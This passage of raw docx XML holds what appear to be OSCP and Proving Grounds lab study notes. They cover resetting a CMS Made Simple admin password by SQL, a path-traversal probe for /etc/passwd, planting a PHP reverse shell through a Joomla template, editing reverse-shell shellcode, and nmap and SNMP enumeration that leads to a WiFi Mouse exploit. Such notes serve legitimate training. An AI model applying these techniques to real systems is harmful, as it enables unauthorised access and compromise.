          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">So, what ended up being the solution was resetting the Admin password. This attack vector came from </w:t>
      </w:r>
      <w:hyperlink r:id="rId1211">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source</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003807">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="151"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1212">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://cmscanbesimple.org/blog/cms-made-simple-admin-password-recovery</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003808">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003809">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="595"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">update cms_users set password = (select md5(CONCAT(IFNULL((SELECT sitepref_value FROM cms_siteprefs WHERE sitepref_name = 'sitemask'),''),'admin'))) where username = 'admin';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000380A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="595"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">select * from cms_users;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000380B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="595"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">See if the password has been successfully changed</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000380C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1422400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="377" name="image359.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image359.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId121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380D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000380E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then from here, since we are authenticated, we can use the authenticated searchsploit exploits. This box was CMSMS Version 2.2.13, but the only available ones were for 2.2.14, so we tried that and it worked. The exploit is </w:t>
      </w:r>
      <w:hyperlink r:id="rId1214">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380F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="234"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1215">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.exploit-db.com/exploits/48779</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003810">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003811">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_d6e6pfq3bhd3" w:id="523"/>
      <w:bookmarkEnd w:id="523"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"File does not exist" error message</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003812">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003813">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4365364" cy="2287619"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="554" name="image537.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image537.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1216"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4365364" cy="2287619"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003814">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1193"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you ever see a message like "File does not exist" or like "File doesn't exist", then that means the website might be parsing for a file. So you can try parameter fuzzing (or manually try ?file=../../../../../../etc/passwd) and get LFI.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003815">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003816">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4748213" cy="2229529"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="402" name="image392.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image392.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1217"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4748213" cy="2229529"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003817">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="854"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">As you can see, it worked here</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003818">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003819">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000381A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_ipzov1ywjaq0" w:id="524"/>
      <w:bookmarkEnd w:id="524"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Joomla</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000381B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000381C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Joomla is a CMS, and in the </w:t>
      </w:r>
      <w:hyperlink r:id="rId1218">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">GlasgowSmile</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Play, after we got past the login page via guessing username as "Joomla" and brute forcing using cewl, we learned to navigate to the Templates section and then Protostar section where we found the index.php page. Now, we can paste a php reverse shell, save it, and then try accessing the index.php page, which activates reverse shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000381D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000381E">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_whz1o5m6ecqo" w:id="525"/>
      <w:bookmarkEnd w:id="525"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ROT1 / ROT13</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000381F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In one of 3 Hard PG Play boxes, they used ROT1, which is the cypher used to rotate all letters by one letter. We just had to guess that this text was ROT1, since it looked like English but the words didn't make sense </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003820">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003821">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003822">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_6fj2q2yza9i" w:id="526"/>
      <w:bookmarkEnd w:id="526"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Editing hexadecimal shell code </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003823">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003824">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the </w:t>
      </w:r>
      <w:hyperlink r:id="rId1219">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Internal</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Practice, they had a hexadecimal shellcode (it was supposed to give a reverse shell), but inside that shell code they have to edit the IP and port number of the payload to make sure the reverse shell connects to right port. So look at the write up for how to navigate that.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003825">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1077"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Here is </w:t>
      </w:r>
      <w:hyperlink r:id="rId1220">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">another</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> write up for that too</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003826">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_prmdy5vg8ren" w:id="527"/>
      <w:bookmarkEnd w:id="527"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">WiFi Mouse (Mouse Server)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003827">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Also seen in </w:t>
      </w:r>
      <w:hyperlink r:id="rId1221">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Mice</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG Practice where they tried a bunch and only this exploit worked:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003828">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1222">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/p0dalirius/RemoteMouse-3.008-Exploit</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003829">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000382A">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is from </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">OSCP-A .145</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000382B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000382C">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">WiFi Mouse (Mouse Server)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1.7.8.5</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000382D">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So, this was a wifi mouse exploit. There seemed to multiple ways to find that out</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000382E">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The first way was to do an UDP scan, see SNMP, and use SNMP to enumerate installed applications, and then you should see wifi mouse 1.7.8.5, which is vulnerable</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000382F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="263"/>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sudo nmap -Pn -n 192.168.236.145 -sU --top-ports=100</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003830">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="263"/>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snmpwalk -c public -v1 192.168.236.145 1.3.6.1.2.1.25.6.3.1.2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003831">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="263"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">you should see</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> iso.3.6.1.2.1.25.6.3.1.2.12 = STRING: "Mouse Server version 1.7.8.5"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003832">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The second way was to see that port 1978 (TCP) was open. NMAP said it was unisql but it was unsure. If you look search up port 1978, the first results are wifi mouse exploits, since I think that's where wifi mouse lives.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003833">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="263"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
